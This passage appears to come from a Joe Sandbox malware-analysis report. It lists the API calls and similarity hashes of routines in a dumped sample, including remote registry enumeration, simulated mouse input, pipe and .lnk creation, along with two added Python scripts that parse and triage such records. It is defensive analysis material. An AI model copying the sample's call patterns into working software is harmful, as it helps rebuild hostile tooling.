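The socket record above reaches one of its calls only through an ordinal import (`#17.WSOCK32`), and several records on this page share an API String ID while having different Opcode IDs (the two CreatePipe helpers, for instance). The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses function records in this report's layout, resolves wsock32.dll ordinals through the DLL's documented export order, separates direct calls from "Part of subcall function" entries, and groups records by API String ID so duplicate API/string profiles are visible. The excerpt it parses is a constructed, trimmed copy of three records from this page; the `SECTIONS` set, the dataclasses and the receive-flagging rule are the example's own choices.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# wsock32.dll export table by ordinal (ordinals 1-23 are the same in ws2_32.dll);
# this is how an ordinal-only import such as "#17.WSOCK32" is resolved.
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 5: "getpeername",
    6: "getsockname", 7: "getsockopt", 8: "htonl", 9: "htons", 10: "inet_addr",
    11: "inet_ntoa", 12: "ioctlsocket", 13: "listen", 14: "ntohl", 15: "ntohs",
    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
    21: "setsockopt", 22: "shutdown", 23: "socket",
}

# Section headers Joe Sandbox emits per function record (assumption: taken from this page).
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Matches "name.MODULE(args), ref: ADDR", "name.MODULE ref: ADDR" and the
# indented "Part of subcall function CALLER: name.MODULE ... ref: ADDR" form.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref: (?P<ref>[0-9A-F]+))?"
)


@dataclass
class ApiCall:
    name: str        # ordinal imports already resolved to their export name
    module: str
    args: str
    ref: str         # call-site address as printed in the report
    subcall_of: str  # "" for a direct call, else the callee whose body made the call


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # Similarity fields: API ID, Opcode ID, ...


def resolve_ordinal(name: str, module: str) -> str:
    """Map '#N' in WSOCK32 to its export name; leave every other name unchanged."""
    if name.startswith("#") and name[1:].isdigit() and module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name


def parse_records(text: str) -> list:
    """Split report text into FunctionRecords; a new record starts at each 'APIs' header."""
    records, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current.apis.append(ApiCall(resolve_ordinal(m["name"], m["module"]), m["module"],
                                            m["args"] or "", m["ref"] or "", m["caller"] or ""))
        elif section == "Strings":
            current.strings.append(body.split(", xrefs:")[0])
        elif section == "Similarity":
            key, _, value = body.partition(":")
            current.meta[key.strip()] = value.strip()
    return records


def direct_api_names(rec: FunctionRecord) -> list:
    """Sorted, de-duplicated names of APIs the function itself calls (subcalls excluded)."""
    return sorted({a.name for a in rec.apis if not a.subcall_of})


def group_by_profile(records) -> dict:
    """Group Opcode IDs by 'API String ID' (Joe's API-set hash + string hash).

    Several Opcode IDs under one profile means distinct function bodies with the
    same API and string footprint, which is what the two CreatePipe helpers show."""
    groups = defaultdict(list)
    for r in records:
        groups[r.meta.get("API String ID", "")].append(r.meta.get("Opcode ID", ""))
    return dict(groups)


def flag_network_receivers(records) -> list:
    """Opcode IDs of functions that read from a socket directly (recv/recvfrom)."""
    return [r.meta.get("Opcode ID", "") for r in records
            if {"recv", "recvfrom"} & set(direct_api_names(r))]


# Constructed excerpt: three records copied from the report above and trimmed.
SAMPLE_REPORT = """\
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CD271D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CD273E
• WSAGetLastError.WSOCK32 ref: 00CD274F
• inet_ntoa.WSOCK32(?), ref: 00CD27E9
  • Part of subcall function 00CB4277: _strlen.LIBCMT ref: 00CB4281
• _strlen.LIBCMT ref: 00CD2892
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• API String ID: 3203458085-0
• Opcode ID: 47165dc28a58b37f80432d9f15ff98dba976306b3eff5191061b2f3c31241365
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00CC0DAE
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0DEA
Strings
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 2fadd37b121a4ac434d0d8b86c9f6e5f6ca21d72d82ced5cdf93284db03c2076
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00CC0E82
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0EBD
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 0a82da2ac00304e4c4782312e49fcda09903f05ddf7762ff36e5ac2a0ced8aaf
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in recs:
        print(r.meta.get("Opcode ID", "")[:16], direct_api_names(r))
    print("receivers:", flag_network_receivers(recs))
    print("profiles:", group_by_profile(recs))
```

Running it prints the resolved API set of each record (the first now reads `recvfrom` instead of `#17`), the Opcode ID of the receiving function, and the profile map in which both CreatePipe bodies fall under the same API String ID. Feeding the full report text to `parse_records` works the same way, because every record begins with its own `APIs` header.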
                                                              APIs
                                                              • __allrem.LIBCMT ref: 00C8044A
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C80466
                                                              • __allrem.LIBCMT ref: 00C8047D
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C8049B
                                                              • __allrem.LIBCMT ref: 00C804B2
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C804D0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                              • Instruction ID: ae2723a10ff6c8f0fef52608523d2248028eee647569ee177d2c970d887ec55d
                                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                              • Instruction Fuzzy Hash: F0810972640706ABD764BE69CC81B6F73E8AF80328F34412EF561D7291E770DE059758
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C78669,00C78669,?,?,?,00C867DF,00000001,00000001,8BE85006), ref: 00C865E8
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C867DF,00000001,00000001,8BE85006,?,?,?), ref: 00C8666E
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C86768
                                                              • __freea.LIBCMT ref: 00C86775
                                                                • Part of subcall function 00C83BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C76A99,?,0000015D,?,?,?,?,00C785D0,000000FF,00000000,?,?), ref: 00C83BE2
                                                              • __freea.LIBCMT ref: 00C8677E
                                                              • __freea.LIBCMT ref: 00C867A3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 06754cb1c33489f95d90bc33eeb67860284dd3e4711ab9c50f49d30cdc12dc7b
                                                              • Instruction ID: 876fb3dbe2eae623bdcf70ed349b20ce6c04027af05ffdc645744e26dc6b8690
                                                              • Opcode Fuzzy Hash: 06754cb1c33489f95d90bc33eeb67860284dd3e4711ab9c50f49d30cdc12dc7b
                                                              • Instruction Fuzzy Hash: 7E51F172600256AFEB24AF64CC82EBF77AAEB41B5CB154228FD24D7140EB34DD40D798
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC629
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CDC684
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC6C9
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CDC6F8
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CDC752
                                                              • RegCloseKey.ADVAPI32(?), ref: 00CDC75E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 1120388591-0
                                                              • Opcode ID: 5337422af66a43b096e6ce6002a7db915194c911f0c2eb65e72bf8f868b17ed1
                                                              • Instruction ID: 1a9f2a3d12eb6de5e8b3ab74ccbb5b6879ace44f3d241eaafaac2ffe4b68446c
                                                              • Opcode Fuzzy Hash: 5337422af66a43b096e6ce6002a7db915194c911f0c2eb65e72bf8f868b17ed1
                                                              • Instruction Fuzzy Hash: A881BE75208241AFC714DF24C8C5E2ABBE5FF84308F14855DF55A8B2A2DB31ED46DB92
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000035), ref: 00CB0049
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB00F0
                                                              • VariantCopy.OLEAUT32(00CB02F4,00000000), ref: 00CB0119
                                                              • VariantClear.OLEAUT32(00CB02F4), ref: 00CB013D
                                                              • VariantCopy.OLEAUT32(00CB02F4,00000000), ref: 00CB0141
                                                              • VariantClear.OLEAUT32(?), ref: 00CB014B
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                              • String ID:
                                                              • API String ID: 3859894641-0
                                                              • Opcode ID: bb08c6eb4a94d8d82dd79bb6d71a711c0a925df171cdd6155ec1ceece4fab601
                                                              • Instruction ID: 2ff3f190b07f465485c6ceeaa240ea08fc8f059890d7f6d21b93f32d9668b88b
                                                              • Opcode Fuzzy Hash: bb08c6eb4a94d8d82dd79bb6d71a711c0a925df171cdd6155ec1ceece4fab601
                                                              • Instruction Fuzzy Hash: 2B51D635640310AFCF24AB659885BAFB3A4EF55310F34844BE906DF296EB709C48DB56
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CC6E36
                                                              • CoInitialize.OLE32(00000000), ref: 00CC6F93
                                                              • CoCreateInstance.OLE32(00CF0CC4,00000000,00000001,00CF0B34,?), ref: 00CC6FAA
                                                              • CoUninitialize.OLE32 ref: 00CC722E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                              • String ID: .lnk
                                                              • API String ID: 886957087-24824748
                                                              • Opcode ID: b3d060bd3b37fe50ede130c3cab19d7869c13941fcb666c9b02365241d0cf9dc
                                                              • Instruction ID: 19ca5225b9086274c69361b9b3b6d7ea746ae0ab342046830b0944c659eaaf83
                                                              • Opcode Fuzzy Hash: b3d060bd3b37fe50ede130c3cab19d7869c13941fcb666c9b02365241d0cf9dc
                                                              • Instruction Fuzzy Hash: 67D16775208201AFC304EF64C881E6BB7E8FF98704F40496DF5959B2A2DB30ED49CB92
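The records on this page are the IDA plugin's per-routine summary of the image dumped from process 0000000A at base 00C50000: each lists the Win32 calls a routine makes, with the address of the call instruction after `ref:`, plus the API ID / String ID fingerprints used for similarity matching. Two of them are worth pulling out of the page programmatically: the registry read-out chain RegConnectRegistryW, RegOpenKeyExW, RegEnumValueW, RegCloseKey above, and the CoInitialize / CoCreateInstance routine whose only referenced string is `.lnk`. The Python script below is an added example, not Joe Sandbox code and not part of the report. It parses records in exactly this layout, rebases every call site to an RVA so it can be matched against the .sdmp or a rebased IDA database, tests a record for an ordered API chain, and flags arguments that are pointers into the dumped image; for CoCreateInstance the first and fourth arguments, 00CF0CC4 and 00CF0B34, are where the CLSID and IID live in the dump, which is what you need to read to learn which COM class is being created (that cannot be read off this page). Assumptions: the sample input is two records abridged from this page, and the 1 MiB window used to decide that an argument points into the image is a heuristic, not a value from the report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: two records abridged from this page, kept in the page's own layout.
SAMPLE = """\
APIs
  • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC629
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CDC684
• RegCloseKey.ADVAPI32(00000000), ref: 00CDC6C9
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CDC6F8
• RegCloseKey.ADVAPI32(?), ref: 00CDC75E
Memory Dump Source
• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
APIs
• _wcslen.LIBCMT ref: 00CC6E36
• CoInitialize.OLE32(00000000), ref: 00CC6F93
• CoCreateInstance.OLE32(00CF0CC4,00000000,00000001,00CF0B34,?), ref: 00CC6FAA
• CoUninitialize.OLE32 ref: 00CC722E
Memory Dump Source
• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• String ID: .lnk
"""

# API line: optional "Part of subcall function <addr>:" prefix, Name.MODULE, optional "(args)",
# then "ref: <addr>", the address of the call instruction inside the dumped image.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s(.]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple             # raw tokens as printed; "?" is a value the plugin could not resolve
    ref: int                # virtual address of the call instruction
    subcall_of: int | None  # callee address when the call happens inside a callee, else None

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    base: int | None = None                     # "Offset:" on the Source File line (image base)
    fields: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, ...

def parse_record(text: str) -> FunctionRecord:
    rec = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            args = tuple(m.group("args").split(",")) if m.group("args") is not None else ()
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            rec.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
        elif line.startswith("•") and ":" in line:
            key, value = (s.strip() for s in line[1:].split(":", 1))
            rec.fields[key] = value
            if key == "Source File":
                off = re.search(r"Offset:\s*([0-9A-F]{8})", value)
                rec.base = int(off.group(1), 16) if off else None
    return rec

def split_records(text: str) -> list:
    """Cut a page dump into records at each bare 'APIs' heading; drop chunks with no calls."""
    chunks, cur = [], []
    for raw in text.splitlines():
        if raw.strip() == "APIs" and cur:
            chunks.append(cur)
            cur = []
        cur.append(raw)
    chunks.append(cur)
    return [r for r in (parse_record("\n".join(c)) for c in chunks) if r.apis]

def direct_calls(rec):
    """Calls the routine makes itself, in listed (ascending address) order."""
    return [c for c in rec.apis if c.subcall_of is None]

def rva(rec, call):
    return call.ref - rec.base  # call-site RVA, to find the instruction in the .sdmp or a rebased IDB

def matches_chain(rec, names):
    """True if `names` appear among the direct calls in this order (other calls may sit between)."""
    it = iter(c.name for c in direct_calls(rec))
    return all(n in it for n in names)

def image_pointer_args(rec, span=0x100000):
    """Arguments that are addresses inside the dumped image (assumption: within `span` bytes of the
    base). For CoCreateInstance they mark where the CLSID and IID are stored in the dump."""
    return [(c.name, int(a, 16)) for c in rec.apis for a in c.args
            if re.fullmatch(r"[0-9A-F]{8}", a) and rec.base is not None
            and rec.base <= int(a, 16) < rec.base + span]

if __name__ == "__main__":
    for rec in split_records(SAMPLE):
        print(" -> ".join(c.name for c in direct_calls(rec)), image_pointer_args(rec))
```

Feed it a saved copy of the page instead of `SAMPLE` to get one record per routine. `matches_chain` is the piece to extend with the sequences you actually triage on (the registry read-out above, or an allocate/write/protect injection sequence), and `image_pointer_args` tells you which offsets in the dump to read for the CLSID/IID or format strings behind a call.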
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CC10C8
                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00CC1103
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00CC111F
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00CC1198
                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00CC11AF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC11DD
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3368777196-0
                                                              • Opcode ID: c7f8f1af5ccbff7d4a39f087d12738d23970abe444cb8d8e6d2df47240b803b7
                                                              • Instruction ID: 2cf130ca3ce601e7622f23dcff6627fe062ea4662539a5faab367bd0535780f7
                                                              • Opcode Fuzzy Hash: c7f8f1af5ccbff7d4a39f087d12738d23970abe444cb8d8e6d2df47240b803b7
                                                              • Instruction Fuzzy Hash: 43414871900205EBDF14AF55DC85AAEB7B8FF45310B1880A9EE04AE296DB34DE51DBA0
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00CAFB8F,00000000,?,?,00000000,?,00C939BC,00000004,00000000,00000000), ref: 00CE8BAB
                                                              • EnableWindow.USER32(?,00000000), ref: 00CE8BD1
                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CE8C30
                                                              • ShowWindow.USER32(?,00000004), ref: 00CE8C44
                                                              • EnableWindow.USER32(?,00000001), ref: 00CE8C6A
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CE8C8E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 8ba789701dd0817b402ff6208adf70035c5b69bc28dfa1f38679acda8ae15b66
                                                              • Instruction ID: a4d574a2d279fd48974233b5564e409dbd1c60328114770888c3269ba74bc0c3
                                                              • Opcode Fuzzy Hash: 8ba789701dd0817b402ff6208adf70035c5b69bc28dfa1f38679acda8ae15b66
                                                              • Instruction Fuzzy Hash: FC416674601284BFDB25CF25CC89BA57BE1FB46314F1841A9F51D8F2A2CB31A949CF60
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00CD2C45
                                                                • Part of subcall function 00CCEE49: GetWindowRect.USER32(?,?), ref: 00CCEE61
                                                              • GetDesktopWindow.USER32 ref: 00CD2C6F
                                                              • GetWindowRect.USER32(00000000), ref: 00CD2C76
                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CD2CB2
                                                              • GetCursorPos.USER32(?), ref: 00CD2CDE
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CD2D3C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                              • String ID:
                                                              • API String ID: 2387181109-0
                                                              • Opcode ID: 33a3b3abcae5b4510ddd69f4a6115d38a7f566019e0c9d285327ae9edcac6e4c
                                                              • Instruction ID: d410c82f1a3f09c1ac400215bd18c02c5c1072b97d7ae1bd08b3c332f2068fa4
                                                              • Opcode Fuzzy Hash: 33a3b3abcae5b4510ddd69f4a6115d38a7f566019e0c9d285327ae9edcac6e4c
                                                              • Instruction Fuzzy Hash: 5331F072505355ABD720DF18C848F9EB7A9FFC4354F00091AF9959B280CB30EA44CB92
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • _wcslen.LIBCMT ref: 00CC61D5
                                                              • CoInitialize.OLE32(00000000), ref: 00CC62EF
                                                              • CoCreateInstance.OLE32(00CF0CC4,00000000,00000001,00CF0B34,?), ref: 00CC6308
                                                              • CoUninitialize.OLE32 ref: 00CC6326
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                              • String ID: .lnk
                                                              • API String ID: 3172280962-24824748
                                                              • Opcode ID: 914ffc7aa9b984c63ced1e71fdc7b9caed8765741317e93c0f7917f70b065e24
                                                              • Instruction ID: ed8d571e26ee034de29444832ab18f5eac931408b1bb59a56d2b9c624fb018cb
                                                              • Opcode Fuzzy Hash: 914ffc7aa9b984c63ced1e71fdc7b9caed8765741317e93c0f7917f70b065e24
                                                              • Instruction Fuzzy Hash: 0ED121756042019FCB14DF24C584E2ABBF5EF89714F14889DF89A9B361CB31ED89CB92
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB210F
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00CB211B
                                                              • CloseHandle.KERNEL32(?), ref: 00CB2124
                                                              • CloseHandle.KERNEL32(?), ref: 00CB212C
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB2135
                                                              • HeapFree.KERNEL32(00000000), ref: 00CB213C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
